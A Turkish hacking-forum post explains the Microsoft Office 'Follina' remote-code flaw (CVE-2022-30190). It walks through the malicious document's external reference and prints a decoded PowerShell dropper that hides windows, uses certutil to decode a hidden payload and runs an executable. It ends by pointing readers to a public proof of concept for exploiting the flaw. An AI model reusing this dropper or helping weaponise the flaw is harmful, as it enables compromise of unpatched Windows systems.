Exploit Microsoft Office "Follina" 0day | CVE-2022-30190 (1 Viewer)

Tron · May 31, 2022

Revealed content

Daha 18 saat önce çıkmış olan Microfost Office RCE açığı 0day (şimdilik) kategorisindedir kısaca Microsoft Office ve yardımcı programlarını etkisi altına alan bu RCE zero-click sayesinde uzaktan kod yürütüle bilir virus taraması açısından Microsoft Defender tarafından bir şey bulamadığından bu Exploiti daha da tehlikeli yapıyor
Exploiti Anlamak
Microsoft Office dosyası olan 05-202-0438.doc dosyasını unzip ettiğimiz zaman karşımıza xml dosyaları çıkacaktır word/_rels/document.xml.rels dosyasını analiz ettiğimizde
word/_rels/document.xml.rels dosyasında harici bir referans içeren hxxps[:]//www.xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l.html dosyası vardır bu bağlantı artık geçerli diğildir lakin dosyanın orjinal içeriği bulunmaktadır.
bu RDF842l.html dosyasının orjinal içeriğidir. Bu HTML belgesi bir komut dosyası etiketi ile başlar ve önemli miktarda yorumlanmış A karakteri içerir, bunlar (sadece yorum oldukları düşünülür) hiçbir amaca hizmet etmez gibi görünmektedir… ancak payloadun başarılı olması için çok sayıda karakter gereklidir
Base64 ile şifrelenmiş kodları decode ettiğimiz zaman powershell ile çalışacak payload komut dosyasını görüyoruz.

Rich (BB code):

$cmd = "c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

PoC
https://github.com/JohnHammond/msdt-follina buradan John Hammond'un paylaştığı proof of concept'i kullanarak zafiyeti istismar ede biliriz.

396 B a